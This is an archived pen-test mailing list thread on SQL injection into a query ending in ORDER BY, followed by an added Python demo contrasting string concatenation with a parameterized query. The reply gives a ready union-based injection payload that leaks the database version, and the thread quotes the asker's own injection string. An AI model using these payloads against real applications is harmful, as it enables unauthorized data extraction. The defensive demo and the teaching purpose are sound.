Re: sql injection with order by

From: Chitresh Sen (chitresh_sen_at_ftml.net)
Date: 04/11/05

  • Next message: Franck Veysset: "Re: Rogue AP Wireless on Windows/Linux"
    To: "dietf dietf" <dietf@yahoo.com>, pen-test@securityfocus.com
    Date: Sun, 10 Apr 2005 18:57:17 -0700
    
    

    Try This

    ' union select convert(int, @@version), 1, 1, 1 --

    On 8 Apr 2005 03:52:02 -0000, "dietf dietf" <dietf@yahoo.com> said:
    >
    >
    > Hi all,
    > I am trying to make an injection with the statement below,
    >
    > SQL = "SELECT ProID, CusID, Name FROM ProTur WHERE Lan=0 AND
    > CusID='%Customer%' ORDER BY Sira, ProjeTurID"
    >
    > In the statement above I inject ")select @@version-- for the variable
    > Customer. But unless I end the injected code with --, nothing happens.
    > I get
    > SQL = "SELECT ProID, CusID, Name FROM ProTur WHERE Lan=0 AND
    > FirmaID=")select @@version-- ORDER BY Sira, ProjeTurID"
    > What is the problem? Can anybody tell me?
    > Does the problem come from the word ORDER BY?
    > Thanks

    -- 
      Chitresh Sen
      chitresh_sen@ftml.net
    
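Added example (editor's note, not part of this thread or either poster's code): the query from the original message rebuilt in Python over an in-memory SQLite table, once by string concatenation exactly as the thread shows it and once with a bound parameter. SQLite is assumed here in place of MS SQL, so `@@version` has no meaning and is just characters inside the literal; the table rows and column types are constructed for the demo. Running both builders on the same inputs shows why the poster's input did nothing against a single-quote-delimited literal, what the trailing `--` does to the ORDER BY clause when a quote in the input does close the literal, and that the parameterized form treats every such input as plain data.

```python
import sqlite3

# Constructed in-memory sample data (not from the thread). The thread names the
# table ProTur and the columns ProID, CusID, Name, Lan, Sira and ProjeTurID;
# the column types and the rows below are assumptions for this demo.
SCHEMA = """
CREATE TABLE ProTur (
    ProID INTEGER, CusID TEXT, Name TEXT,
    Lan INTEGER, Sira INTEGER, ProjeTurID INTEGER
);
INSERT INTO ProTur VALUES (1, 'ACME',  'Roof',  0, 2, 10);
INSERT INTO ProTur VALUES (2, 'ACME',  'Wall',  0, 1, 11);
INSERT INTO ProTur VALUES (3, 'OTHER', 'Floor', 0, 1, 12);
"""

# The original poster's input, exactly as quoted in the thread.
OP_INPUT = '")select @@version--'


def open_db():
    """Create a fresh in-memory database loaded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def build_vulnerable_sql(customer):
    # Mirrors the thread's concatenation: the user value lands inside a
    # single-quoted literal and ORDER BY follows on the same line.
    return ("SELECT ProID, CusID, Name FROM ProTur WHERE Lan=0 AND "
            "CusID='" + customer + "' ORDER BY Sira, ProjeTurID")


def vulnerable_outcome(conn, customer):
    """Execute the concatenated query and report what the database did.

    Returns ("rows", [...]) on success or ("syntax_error", message) when the
    assembled text is not valid SQL.
    """
    try:
        return ("rows", conn.execute(build_vulnerable_sql(customer)).fetchall())
    except sqlite3.OperationalError as exc:
        return ("syntax_error", str(exc))


def query_parameterized(conn, customer):
    # Hardened form: the value is bound as a parameter, so quotes, parentheses
    # and comment markers inside it are data, never SQL, and ORDER BY is intact.
    sql = ("SELECT ProID, CusID, Name FROM ProTur WHERE Lan=0 AND "
           "CusID=? ORDER BY Sira, ProjeTurID")
    return conn.execute(sql, (customer,)).fetchall()


if __name__ == "__main__":
    db = open_db()
    # The poster's input never closes a '-delimited literal: valid SQL, zero rows.
    print(build_vulnerable_sql(OP_INPUT))
    print(vulnerable_outcome(db, OP_INPUT))
    # A legitimate value: both builders agree and the rows come back ordered by Sira.
    print(vulnerable_outcome(db, "ACME"))
    print(query_parameterized(db, "ACME"))
    # An input containing a closing quote and "--": the concatenated query loses
    # its ORDER BY (rows come back in table order); the bound parameter matches nothing.
    print(vulnerable_outcome(db, "ACME' --"))
    print(query_parameterized(db, "ACME' --"))
```

The point for whoever owns the application is the last pair of calls: the moment a quote in the input closes the literal, everything after `--` (including the ORDER BY the poster was worried about) is simply gone, and the only reliable fix is the bound parameter, not filtering the word ORDER BY.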
